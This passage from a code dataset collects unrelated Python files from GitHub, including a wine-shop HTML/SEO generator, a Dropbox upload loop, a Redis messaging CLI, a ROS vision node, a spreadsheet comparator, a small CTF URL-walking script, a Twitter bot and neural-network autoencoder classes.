Бутлерова 17Б) \\n'\n file.write(msg)\n file.close()\n\ndef descriptions_generator():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/descriptions/{card_name[row].lower().replace(\" \", \"_\")}.txt', 'a') as file:\n description = f'Шеваль Блан {vintage[row]} (оценка: {rp[row]}), главное вино Сент-Эмильона в WineTime. Собственный импорт, лучшие цены и условия хранения, селективный ассортимент.\\n'\n file.write(description)\n file.close()\n\n\ndef titles_generator():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/titles/{card_name[row].lower().replace(\" \", \"_\")}.txt', 'a') as file:\n title = f'{card_name[row]} {vintage[row]} — купить по лучшей цене!\\n'\n file.write(title)\n file.close()\n\n\ndef get_url():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/titles/{card_name[row].lower().replace(\" \", \"_\")}.txt', 'a') as file:\n title = f'{url[row]}\\n'\n file.write(title)\n file.close()\n\n\n\nget_url()\n# titles_generator()\n# descriptions_generator()\n# create_html()\n# create_alt_seo()\n\n","repo_name":"dmitriykodolov/schema_converter","sub_path":"tilda_combine/html_generator/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20130976790","text":"\"\"\" \n ce script tourne en permanence : \n il recherche des fichiers dans le repertoire\n path et il les copie dans une dropbox distante.\n Si tout se passe bien, il supprime les fichiers locaux.\n\"\"\"\n\nimport os\nimport time\npath=\"./images/\"\ndef upload_files():\n if not os.path.exists(path):\n return\n dir_list = os.listdir(path)\n first_10 = dir_list[:10]\n for file_name in first_10:\n file_full_path = path + file_name\n print(file_full_path) \n cmd = \"./DropBox/Dropbox-Uploader/dropbox_uploader.sh upload \" + file_full_path + \" .\"\n returnCode=os.system(cmd)\n # ne supprimer les fichiers que si la commande s'est bien deroulee\n if returnCode == 0:\n os.remove(file_full_path)\n else:\n print(\"Erreur lors de l'appel du script\")\n print (returnCode)\n\n \nif __name__ == \"__main__\":\n while True:\n print(\"Uploadingfile\")\n upload_files()\n time.sleep(10)\n","repo_name":"romanaccio/aidevig-rasp","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31258898847","text":"import redis\nfrom src.logger import Logger\nfrom src.controllers.authorisation import Authorisation\nfrom src.controllers.messages import Messages\n\nconnection = redis.Redis(host=\"192.168.99.102\", charset=\"utf-8\", decode_responses=True)\n\n\ndef run_interface():\n auth = Authorisation()\n messages = Messages()\n user_id = -1\n logged_in = False\n listener = Logger(connection)\n listener.setDaemon(True)\n listener.start()\n\n while True:\n if not logged_in:\n display_start_menu()\n command = int(input(\"$ \"))\n if command == 1:\n login = input(\"Enter your login: \")\n auth.signup(login)\n\n elif command == 2:\n login = input(\"Enter your login: \")\n user_id = auth.login(login)\n logged_in = user_id != -1\n\n elif command == 3:\n break\n\n else:\n print(\"No such operation\")\n\n else:\n display_menu()\n command = int(input(\"$ \"))\n\n if command == 1:\n msg = input(\"Write your message: \")\n receiver_login = input(\"Write the login of person you want to get this message: \")\n\n receiver = 
connection.hget(\"users:\", receiver_login)\n if receiver is not None:\n messages.create(msg, user_id, int(receiver))\n print(\"Message sent!\")\n else:\n print(\"Receiver does not exist!\")\n\n elif command == 2:\n messages.get_all(user_id)\n\n elif command == 3:\n current = connection.hmget(\"user:%s\" % user_id,\n ['in_queue', 'checking', 'blocked', 'sent',\n 'delivered'])\n print(\n \"In queue: %s\\nIs checking: %s\\nBlocked: %s\\nSent: %s\\nDelivered: %s\" % tuple(current))\n\n elif command == 4:\n login = connection.hmget(\"user:%s\" % user_id, [\"login\"])[0]\n auth.logout(login)\n logged_in = False\n user_id = -1\n\n else:\n print(\"No such operation\\n\")\n\n\ndef display_start_menu():\n print(\"Welcome to messaging tool! Sign up to start using! Or login if you already have an account\")\n print(\"Sign up(1)\")\n print(\"Log in(2)\")\n print(\"Close(3)\")\n\n\ndef display_menu():\n print(\"\\nSend new message(1)\")\n print(\"Received messages(2)\")\n print(\"Messages' info(3)\")\n print(\"Log out(4)\")\n\n\nif __name__ == '__main__':\n run_interface()\n","repo_name":"artyoda05/Tiutiunnyk_db_sem2","sub_path":"lab2/src/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20940984337","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfilename = './befkbhalderstatkode.csv'\n\nbef_stats_df = np.genfromtxt(\n filename, delimiter=',', dtype=np.uint, skip_header=1)\nprint(type(bef_stats_df), ' of size: ', bef_stats_df.size)\nprint('The skip_header=1 means that we have only the data\\n\\nfirst line:\\n',\n bef_stats_df[0], '\\nlast line\\n', bef_stats_df[len(bef_stats_df)-1])\n\ndd = bef_stats_df\nmask = (dd[:, 0] == 1998) # for all rows filter column/index = 0 to be 1998\ndd[mask]\n\nmask = (dd[:, 0] == 2015) & (dd[:, 2] == 18) & (dd[:, 3] == 5100)\nprint(dd[mask])\nplt.axis([0, 10, 300, 600])\nplt.bar(dd[:, 1], dd[:, 4])\nnp.sum(dd[mask][:, 4])\nplt.show()\n","repo_name":"MalteMagnussen/PythonProjects","sub_path":"week4/numpy/bigdata.py","file_name":"bigdata.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18402277883","text":"import collections\nimport sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\npokemon1 = [None] * (n + 1)\npokemon2 = collections.defaultdict()\nidx = 1\nfor i in range(n):\n name = input().strip()\n pokemon1[idx] = name\n pokemon2[name] = idx\n idx += 1\n\nresult = ''\nproblems = [input().strip() for _ in range(m)]\nfor problem in problems:\n if problem.isdigit():\n result += pokemon1[int(problem)] + '\\n'\n else:\n result += str(pokemon2[problem]) + '\\n'\n\nprint(result)","repo_name":"Yiseull/baekjoon-python3","sub_path":"실버/1620_나는야 포켓몬 마스터 이다솜.py","file_name":"1620_나는야 포켓몬 마스터 이다솜.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3764406227","text":"#!/usr/bin/env python\nimport cv2\nimport numpy as np\n\ntry:\n import RPi.GPIO as GPIO\n from crues_sensors.msg import Vision\n from std_msgs.msg import Bool\n from imutils.video import VideoStream\n import rospy\n pi = True\nexcept ImportError:\n import crues.GPIO_MOCK as GPIO\n pi = False\n\n\nclass RobotDetector:\n def __init__(self):\n self.name = rospy.get_param('hostname', 'robot')\n self.robots = [r for r in rospy.get_param('robots', []) if 
r['name'] != self.name]\n self.goals = rospy.get_param('goals', [])\n if pi:\n frame_size = (640, 480)\n self.frame_rate = rospy.get_param('~framerate', 10)\n self.cap = VideoStream(src=0, usePiCamera=pi, resolution=frame_size,\n framerate=self.frame_rate).start()\n rospy.init_node(\"vision\", anonymous=False)\n self.recording = rospy.get_param(\"~recording\", False)\n self.robot_pub = rospy.Publisher('robots_detected', Vision, queue_size=10)\n self.goal_pub = rospy.Publisher('goal_detected', Bool, queue_size=10)\n self.rate = rospy.Rate(self.frame_rate)\n if self.recording:\n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n self.recorder = cv2.VideoWriter('/home/crues/rosbag/output.avi', fourcc, self.frame_rate, (640, 480))\n else:\n self.cap = cv2.VideoCapture(1)\n\n def search(self, search_frame, objects):\n \"\"\"Search search_frame for objects and return relevant information\n @:returns found - list of objects found\n @:returns coords - list of (x, y) tuples of centre of mass of objects\n @:returns outlines - list of object outlines\n \"\"\"\n found, coords, outlines = [], [], []\n for o in objects:\n colour_mask = self.get_colour_mask(search_frame, o['hsv_min'], o['hsv_max'])\n _, contours, _ = cv2.findContours(colour_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n maxsize = 0\n cx, cy, outline = None, None, None\n obj_found = False\n for c in contours:\n if cv2.contourArea(c) > max((10000, maxsize)): # & cv2.arcLength(c,True):\n maxsize = cv2.contourArea(c)\n cx, cy = self.get_centre_point(c)\n outline = self.get_outline(c)\n obj_found = True\n if obj_found:\n found.append(o)\n coords.append((cx, cy))\n outlines.append(outline)\n return found, coords, outlines\n\n def get_colour_mask(self, frame, lower_hsv_bound, higher_hsv_bound):\n \"\"\"Return a Boolean mask the size of frame, where 1's\n are where 'frames' pixel is within the colour range\"\"\"\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n if lower_hsv_bound[0] > higher_hsv_bound[0]:\n mask1 = cv2.inRange(hsv_frame, np.array([0, lower_hsv_bound[1], lower_hsv_bound[2]]),\n np.array(higher_hsv_bound))\n mask2 = cv2.inRange(hsv_frame, np.array(lower_hsv_bound),\n np.array([179, higher_hsv_bound[1], higher_hsv_bound[2]]))\n mask = mask1 | mask2\n else:\n lower = np.array(lower_hsv_bound)\n upper = np.array(higher_hsv_bound)\n mask = cv2.inRange(hsv_frame, lower, upper)\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.erode(mask, kernel, iterations=1)\n mask = cv2.dilate(mask, kernel, iterations=1)\n return mask\n\n def get_outline(self, contour):\n \"\"\"return the approximate polygon surrounding the contour\"\"\"\n epsilon = 0.01 * cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, epsilon, True)\n return approx\n\n def get_centre_point(self, contour):\n \"\"\"find centre of mass of contour\"\"\"\n M = cv2.moments(contour)\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n else:\n cX, cY = 0, 0\n return cX, cY\n\n def spin(self):\n try:\n while not rospy.is_shutdown():\n self._tick()\n self.rate.sleep()\n finally:\n if self.recording:\n self.recorder.release()\n\n def _draw_bounding_rects(self, frame, objects, outlines):\n for i, o in enumerate(objects):\n x, y, w, h = cv2.boundingRect(outlines[i])\n cv2.rectangle(frame, (x, y), (x + w, y + h), tuple(o['rgb']), 2)\n cv2.putText(frame, o['name'], (x - 20, y - 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, tuple(o['rgb']), 2)\n self.recorder.write(frame)\n\n def 
_tick(self):\n if pi:\n frame = self.cap.read()\n frame = cv2.flip(frame, -1)\n else:\n _, frame = self.cap.read()\n if frame is not None:\n robots, _, r_outlines = self.search(frame, self.robots)\n goals, _, g_outlines = self.search(frame, self.goals)\n msg = Vision()\n msg.robot_list = \", \".join([robot['name'] for robot in robots])\n self.robot_pub.publish(msg)\n self.goal_pub.publish(True if goals else False)\n if self.recording:\n self._draw_bounding_rects(frame, robots + goals, r_outlines + g_outlines)\n\n\ndef _test():\n rd = RobotDetector()\n if pi:\n cap = rd.cap\n else:\n cap = cv2.VideoCapture(0)\n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640, 480))\n\n rec = False\n while True:\n if pi:\n frame = cap.read()\n else:\n _, frame = cap.read()\n objects, coords, outlines = rd.search(frame, rd.robots)\n for i, o in enumerate(objects):\n x, y, w, h = cv2.boundingRect(outlines[i])\n cv2.rectangle(frame, (x, y), (x + w, y + h), o['rgb'], 2)\n cv2.putText(frame, o, (x - 20, y - 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, o['rgb'], 2)\n cv2.imshow('frame2', frame)\n if not pi:\n out.write(frame)\n key = cv2.waitKey(10)\n if key & 0xFF == ord('r'):\n if rec:\n out.release()\n rec = False\n else:\n print(\"Recording\")\n rec = True\n if key & 0xFF == ord('q'):\n break\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n if pi:\n try:\n cv = RobotDetector()\n cv.spin()\n except rospy.ROSInterruptException:\n cv.cap.stop()\n else:\n _test()\n","repo_name":"rddunphy/CRUES","sub_path":"crues_pi/ros_pkgs/crues_sensors/scripts/vision_node.py","file_name":"vision_node.py","file_ext":"py","file_size_in_byte":6873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39395059400","text":"import logging\n\nfrom openpyxl import load_workbook\n\nfrom bcompiler.utils import index_returns_directory\nfrom bcompiler.process import Cleanser\n\nlogger = logging.getLogger('bcompiler.process.simple_comparitor')\n\n\nclass BCCell:\n\n def __init__(self, value, row_num=None, col_num=None, cellref=None):\n self.value = value\n self.row_num = row_num\n self.col_num = col_num\n self.cellref = cellref\n\n\nclass ParsedMaster:\n\n def __init__(self, master_file):\n self.master_file = master_file\n self._projects = []\n self._project_count = None\n self._key_col = []\n self._wb = load_workbook(self.master_file)\n self._ws = self._wb.active\n self._project_header_index = {}\n self._parse()\n\n def _cleanse_key(self, key):\n c = Cleanser(key)\n return c.clean()\n\n def _parse(self):\n \"\"\"\n Private method to set up the class.\n self._key_col is column 'A' in the masters format.\n \"\"\"\n self._projects = [cell.value for cell in self._ws[1][1:]]\n# self._projects.sort()\n self._project_count = len(self.projects)\n self._key_col = [self._cleanse_key(cell.value) for cell in self._ws['A']]\n self._index_projects()\n\n @property\n def projects(self):\n \"\"\"\n Returns a list of project titles in the master.\n \"\"\"\n return self._projects\n\n def _create_single_project_tuple(self, column=None, col_index=None):\n \"\"\"\n Private method to construct a tuple of key, values based on\n the particular project (identified by reference to the its column,\n and can be given as a letter ('H') or an integer.\n\n This method is internal and is called by self.get_project_data.\n \"\"\"\n if col_index is None:\n col_data = self._ws[column]\n z = list(zip(self._key_col, 
col_data))\n return [((item[0]), (item[1].value)) for item in z]\n else:\n col_data = []\n for row in self._ws.iter_rows(\n min_row=1,\n max_col=col_index,\n min_col=col_index,\n max_row=len(self._key_col)\n ):\n count = 0\n for cell in row:\n col_data.append(cell.value)\n count += 1\n z = list(zip(self._key_col, col_data))\n return [((item[0]), (item[1])) for item in z]\n\n def _index_projects(self):\n self._project_header_index = {}\n for cell in self._ws[1]:\n if cell.value in self.projects:\n self._project_header_index[cell.value] = cell.col_idx\n\n def print_project_index(self):\n print('{:<68}{:>5}'.format(\"Project Title\", \"Column Index\"))\n print('{:*^80}'.format(''))\n for k, v in self._project_header_index.items():\n print('{:<68}{:>5}'.format(k, v))\n\n def _create_dict_all_project_tuples(self):\n pass\n\n def __repr__(self):\n return \"ParsedMaster for {}\".format(\n self.master_file\n )\n\n def get_project_data(self, column=None, col_index=None):\n if column is None and col_index is None:\n raise TypeError('Please include at least one param')\n\n if column == 'A':\n raise TypeError(\"column must be 'B' or later in alphabet\")\n\n if column:\n if isinstance(column, type('b')):\n data = self._create_single_project_tuple(column)\n else:\n raise TypeError('column must be a string')\n\n if col_index:\n if isinstance(col_index, type(1)):\n data = self._create_single_project_tuple(col_index=col_index)\n else:\n raise TypeError('col_index must be an integer')\n\n return data\n\n def _query_for_key(self, data, key):\n \"\"\"\n Iterate through keys in output from get_project_data\n data list and return True if a key is found. Does not return\n anything if not found.\n \"\"\"\n for item in data:\n if item[0] == key:\n self._query_result = item[1]\n return True\n\n def get_data_with_key(self, data, key):\n \"\"\"\n Given a data list with project key/values in it (derived from\n a master spreadsheet, query a specific key to return a value.\n \"\"\"\n # first query that the value exists\n if self._query_for_key(data, key):\n return self._query_result\n else:\n logger.warning(\"No key {} in comparing master. Check for double spaces in cell in master. Skipping\".format(key))\n return None\n\n def index_target_files_with_previous_master(self):\n \"\"\"\n A previous master has a column-order of projects. If we are going\n to compare this with a series of projects used in bcompiler compile,\n which traverses a target directory and compiles each in turn into\n a master spreadsheet, the order must match, otherwise comparing\n values will not work.\n\n This function first gets obtains the order of project names from the\n files in the 'returns' directory, the it obtains the order or projects\n from the column headers in the master file from this object.\n \"\"\"\n target_project_names = index_returns_directory()\n master_title_names = [\n key for key, value in self._project_header_index.items()]\n return (target_project_names, master_title_names)\n\n\ndef populate_cells(worksheet, bc_cells=[]):\n \"\"\"\n Populate a worksheet with bc_cell object data.\n \"\"\"\n for item in bc_cells:\n if item.cellref:\n worksheet[item.cellref].value = item.value\n else:\n worksheet.cell(\n row=item.row_num, column=item.col_num, value=item.value)\n return worksheet\n\n\nclass FileComparitor:\n \"\"\"\n Simple method of comparing data in two master spreadsheets.\n \"\"\"\n\n def __init__(self, masters=[]):\n \"\"\"\n We want to get a list of master spreadsheets. These are simple\n file-references. 
The latest master should be master[-1].\n \"\"\"\n self._comp_type = None\n\n if len(masters) > 2:\n raise ValueError(\"You can only analyse two spreadsheets.\")\n\n if len(masters) == 2:\n # we're comparing two files\n self._masters = masters\n self._comp_type = 'two'\n self._get_data()\n\n if len(masters) == 1:\n # we're comparing against one single master\n self._master = masters[0]\n self._comp_type = 'one'\n self._get_data()\n\n def _get_data(self):\n \"\"\"\n Private method that creates two ParsedMaster objects in a tuple. First\n is the earlier master, the second is the current. These states are\n derived from the order that the file references are given to the\n constructor.\n \"\"\"\n if self._comp_type == 'two':\n self._early_master = ParsedMaster(self._masters[0])\n self._current_master = ParsedMaster(self._masters[1])\n return (self._early_master, self._current_master)\n\n if self._comp_type == 'one':\n self._early_master = ParsedMaster(self._master)\n return self._early_master\n\n @property\n def data(self):\n return self._early_master\n\n def compare(self, proj_index, key):\n \"\"\"\n Returns a tuple of two values, the first is the value of key in\n proj_index in the early master, the second the equivalent in the\n current master. proj_index should be an integer and can be derived\n from the import spreadsheet or by ParsedMaster.print_project_index.\n \"\"\"\n if self._comp_type == 'two':\n project_data_early = self._early_master.get_project_data(\n col_index=proj_index)\n project_data_current = self._current_master.get_project_data(\n col_index=proj_index)\n return(\n self._early_master.get_data_with_key(\n project_data_early, key),\n self._current_master.get_data_with_key(\n project_data_current, key))\n\n if self._comp_type == 'one':\n project_data_early = self._early_master.get_project_data(\n col_index=proj_index)\n return(\n self._early_master.get_data_with_key(project_data_early, key))\n","repo_name":"yulqen/bcompiler","sub_path":"bcompiler/process/simple_comparitor.py","file_name":"simple_comparitor.py","file_ext":"py","file_size_in_byte":8478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"24641988428","text":"# using random module for health potion\n\nimport random\n\n# choose your difficulty\n\nprint(\"Which difficulty would you like? 
[Easy, Medium, Hard]\")\n\n# first variable\n\ndifficulty1 = input('Difficulty: ').strip()\n\n# if statement that exits if difficulty does not exist\n\nif 'Easy' in difficulty1:\n print('Potions will heal 25-50 health')\n\nelif 'Medium' in difficulty1:\n print('Potions will health 13-25 health')\n\nelif 'Hard' in difficulty1:\n print('Potions will heal 8-16 health')\n\nelse:\n exit()\n\n# assigning value to 'health' variable\n\nhealth = 50\n\n# the higher the difficulty the less health the potion will give\n# assigning a list to a variable for this\n\ndifficulty2 = [1,2,3]\n\n# another if statement referring back to the first variable to determine output\n# converting all output to integers as we don't want floats in the new variable\n\nif 'Easy' in difficulty1:\n potion_health = random.randint(25,50) / int(difficulty2[0])\n print('This time you will gain...')\n print(int(potion_health), 'health')\n\nelif 'Medium' in difficulty1:\n potion_health = random.randint(25,50) / int(difficulty2[1])\n print('This time you will gain...')\n print(int(potion_health), 'health')\n\nelif 'Hard' in difficulty1:\n potion_health = random.randint(25,50) / int(difficulty2[2])\n print('This time you will gain...')\n print(int(potion_health), 'health')\n\nelse:\n exit()\n\n# assigning 'health' variable a new value by adding it to our new variable 'potion_health'\n\nhealth = health + potion_health\n\n# displays health depending on difficulty chosen\n\nprint('Your total health is now', int(health))\n","repo_name":"Jarodx4/Learning","sub_path":"potion_project.py","file_name":"potion_project.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25585987565","text":"import requests\nimport json\n\nBASE_IP = \"http://10.10.169.100:3000/\"\n\nresponse = {\"value\":\"s\",\"next\":\"f\"}\nflag = \"\"\nwhile response['next'] != \"end\":\n flag += response['value']\n url = BASE_IP + response['next']\n res = requests.get(url)\n response = json.loads(res.text)\n\n print(flag)\n","repo_name":"krishnan-tech/ctf-writeups","sub_path":"tryhackme/25daysofchristmas/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"34498977078","text":"from openpyxl import Workbook\nfrom openpyxl.utils import get_column_letter\n\n# 实例化一个工作簿对象\nwb = Workbook()\n\n# 定义 excel 文件名\ndest_filename = 'empty_book.xlsx'\n\n# 选取了当前工作的sheet对象\nws1 = wb.active\n\n# 为 sheet 命名\nws1.title = \"range names\"\nfor row in range(1,40):\n ws1.append(range(600))\n\nws2 = wb.create_sheet(title='Pi')\nws2['F5'] = 3.14\n\nws3 = wb.create_sheet(title=\"Data\")\nfor row in range(10,20):\n for col in range(27,54):\n _ = ws3.cell(column=col, row=row, value=\"{0}\".format(get_column_letter(col))) # 得到表格列的字母编号\n\nprint(ws3['AA10'].value)\n\nwb.save(filename=dest_filename)\n\n\n","repo_name":"Shelbin/laixiaobin_autotest","sub_path":"hogwarts/oper_excel/write_excel.py","file_name":"write_excel.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26673519598","text":"import tweepy\nimport config\nimport redditnews\nimport text2emoji\n\nauth = tweepy.OAuthHandler(config.CONSUMER_KEY, config.CONSUMER_SECRET)\nauth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\napi = tweepy.API(auth)\n\n#tweet clean up\nuser = api.me()\ntweetHistory 
= api.user_timeline(id = user.id)\nfor tweet in tweetHistory:\n api.destroy_status(id = tweet.id)\n\nheadlines = redditnews.getRedditHeadlines()\nfor headline in headlines:\n api.update_status(status = text2emoji.sentence_to_emoji(headline))\n\nprint('End')\n","repo_name":"SergioSanchez12/TwitterBot","sub_path":"twitterbot.py","file_name":"twitterbot.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74228913762","text":"from __future__ import print_function, division\nimport os,unittest\nfrom pyscf.nao import tddft_iter\n\ndname = os.path.dirname(os.path.abspath(__file__))\n\ntd = tddft_iter(label='water', cd=dname)\ntry:\n from pyscf.lib import misc\n libnao_gpu = misc.load_library(\"libnao_gpu\")\n td_gpu = tddft_iter(label='water', cd=dname, GPU=True)\nexcept:\n td_gpu = None\n\nclass KnowValues(unittest.TestCase):\n \n def test_tddft_iter(self):\n \"\"\" This is iterative TDDFT with SIESTA starting point \"\"\"\n self.assertTrue(hasattr(td, 'xocc'))\n self.assertTrue(hasattr(td, 'xvrt'))\n self.assertTrue(td.ksn2f.sum()==8.0) # water: O -- 6 electrons in the valence + H2 -- 2 electrons\n self.assertEqual(td.xocc[0].shape[0], 4)\n self.assertEqual(td.xvrt[0].shape[0], 19)\n dn0 = td.apply_rf0(td.moms1[:,0])\n\n def test_tddft_iter_gpu(self):\n \"\"\" Test GPU version \"\"\"\n if td_gpu is not None:\n self.assertTrue(hasattr(td_gpu, 'xocc'))\n self.assertTrue(hasattr(td_gpu, 'xvrt'))\n self.assertTrue(td_gpu.ksn2f.sum()==8.0) # water: O -- 6 electrons in the valence + H2 -- 2 electrons\n self.assertEqual(td_gpu.xocc[0].shape[0], 4)\n self.assertEqual(td_gpu.xvrt[0].shape[0], 19)\n dn0 = td_gpu.apply_rf0(td_gpu.moms1[:,0])\n\n \n\nif __name__ == \"__main__\": unittest.main()\n","repo_name":"pyscf/nao","sub_path":"pyscf/nao/test/test_0017_tddft_iter_nao.py","file_name":"test_0017_tddft_iter_nao.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"73450808803","text":"import SegNet\nfrom Pavements import Pavements\n\nimport os\nimport argparse\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nfrom torchvision.utils import save_image\nfrom itertools import product\n\nNUM_OF_CLASSES = 4\nMODEL_NAME = './models/model_10.pth.tar'\n\ndef build_color_map():\n # assumes no. 
of classes to be <= 64\n color_map = torch.tensor(list(product([63, 127, 191, 255], repeat=3)))\n\n print()\n print(\"Map of class to color: \")\n for class_ind, color in enumerate(color_map):\n print(\"Class: {}, RGB Color: {}\".format(class_ind + 1, color))\n\n print()\n\n return color_map\n\ncuda_available = torch.cuda.is_available()\nmodel = SegNet.SegNet(in_chn=3, out_chn=NUM_OF_CLASSES, BN_momentum=0.5)\n\nif cuda_available:\n model.cuda()\n\nmodel.eval()\n\ncheckpoint = torch.load(MODEL_NAME)\nepoch = checkpoint['epoch']\nstate_dict = checkpoint['state_dict']\nmodel.load_state_dict(state_dict)\nprint(\"Checkpoint is loaded at {} | Epochs: {}\".format(MODEL_NAME, epoch))\n\n\ndataset = Pavements('./CamVid/test', './CamVid/test_labels')\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=1)\ncolor_map = build_color_map()\n\nfor i, data in enumerate(dataloader):\n images, labels = data\n labels = labels.type(torch.long)\n\n if cuda_available:\n images = images.cuda()\n labels = labels.cuda()\n \n result = model(images)\n result = torch.argmax(result, dim=1).type(torch.long)\n\n for j in range(result.shape[0]):\n input_image = images[j]\n label_image = color_map[labels[j]].permute(2, 0, 1).to(torch.float).div(255.0)\n result_image = color_map[result[j]].permute(2, 0, 1).to(torch.float).div(255.0)\n\n if cuda_available:\n input_image =input_image.cuda()\n label_image = label_image.cuda()\n result_image = result_image.cuda()\n \n folder = ['input', 'label', 'result']\n for k, img in enumerate([input_image, label_image, result_image]):\n path = './results/{}/{}_{}.png'.format(folder[k], i, j)\n save_image(img, path)\n ","repo_name":"chiajoukuo/dlcv_final","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22492589720","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\n\nfrom dataclasses import dataclass\nfrom functools import reduce\n\nfrom typing import List\n\nTORCH_PI = torch.acos(torch.zeros(1))\n\nclass BasicAE(nn.Module):\n def __init__(self, feature_dims : int = 10, latent_dim : int = 64, latent_out=False, softplus=True):\n super().__init__()\n self._latent_dim = latent_dim\n\n if isinstance(feature_dims, tuple):\n self.encoding_layer = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(feature_dims), self._latent_dim)\n )\n self.decoding_layer = torch.nn.Sequential(\n torch.nn.Linear(self._latent_dim, tuple_product(feature_dims)),\n ReshapeView(feature_dims)\n )\n else:\n self.encoding_layer = nn.Linear(feature_dims, latent_dim)\n self.decoding_layer = nn.Linear(latent_dim, feature_dims)\n\n self.latent_out = latent_out\n\n self.softplus = softplus\n\n def forward(self, x):\n z = self.encode(x)\n x = self.decode(z)\n if self.latent_out:\n return x, {\"latent\": z}\n else:\n return x\n\n def encode(self, x):\n if self.softplus:\n x = F.softplus(self.encoding_layer(x))\n else:\n x = self.encoding_layer(x)\n return x\n\n def decode(self, x):\n x = self.decoding_layer(x)\n return x\n\n\nclass Basic2LAE(nn.Module):\n def __init__(self, feature_dims : int = 10, intermediate_dim=100, latent_dim : int = 64):\n super().__init__()\n self._latent_dim = latent_dim\n\n\n if isinstance(feature_dims, tuple):\n self.encoding_layer = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(feature_dims), self._latent_dim)\n )\n self.decoding_layer = 
torch.nn.Sequential(\n torch.nn.Linear(self._latent_dim, tuple_product(feature_dims)),\n ReshapeView(feature_dims)\n )\n else:\n self.encoding_layer = nn.Linear(intermediate_dim, latent_dim)\n self.decoding_layer = nn.Linear(intermediate_dim, feature_dims)\n\n self.encoding_h = nn.Linear(feature_dims, intermediate_dim)\n\n self.decoding_h = nn.Linear(latent_dim, intermediate_dim)\n\n self.act = F.softplus #F.LeakyRelu\n self.fact = lambda x: x #F.softplus #F.tanh\n\n def forward(self, x):\n x = self.encode(x)\n x = self.decode(x)\n return x\n\n def encode(self, x):\n x = self.act(self.encoding_h(x))\n x = self.fact(self.encoding_layer(x))\n return x\n\n def decode(self, x):\n x = self.act(self.decoding_h(x))\n x = self.fact(self.decoding_layer(x))\n return x\n\n\n\nclass BasicVAE(nn.Module):\n def __init__(self,\n feature_dims : int = 10, latent_dim : int = 64,\n encoding_act=None, decoding_act=None, final_act=None):\n super().__init__()\n self._latent_dim = latent_dim\n\n if isinstance(feature_dims, tuple):\n tot_features = tuple_product(feature_dims)\n im_features = tot_features//2\n print(tot_features)\n self.encoding_layer_0 = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tot_features,\n im_features)\n )\n self.decoding_layer_mu = torch.nn.Sequential(\n torch.nn.Linear(im_features, tot_features),\n ReshapeView(feature_dims)\n )\n self.decoding_layer_logvar = torch.nn.Sequential(\n torch.nn.Linear(im_features, tot_features),\n ReshapeView(feature_dims)\n )\n else:\n tot_features = feature_dims\n im_features = tot_features//2\n self.encoding_layer_0 = nn.Linear(feature_dims, im_features)\n self.decoding_layer_mu = nn.Linear(im_features, feature_dims)\n self.decoding_layer_logvar = nn.Linear(im_features, feature_dims)\n \n \n\n self.encoding_mu = nn.Linear(im_features, latent_dim)\n self.encoding_logvar = nn.Linear(im_features, latent_dim)\n\n self.decoding_layer_0 = nn.Linear(latent_dim, im_features)\n\n if encoding_act is not None:\n self.encoding_act = encoding_act\n else:\n self.encoding_act = F.leaky_relu\n\n if decoding_act is not None:\n self.decoding_act = decoding_act\n else:\n 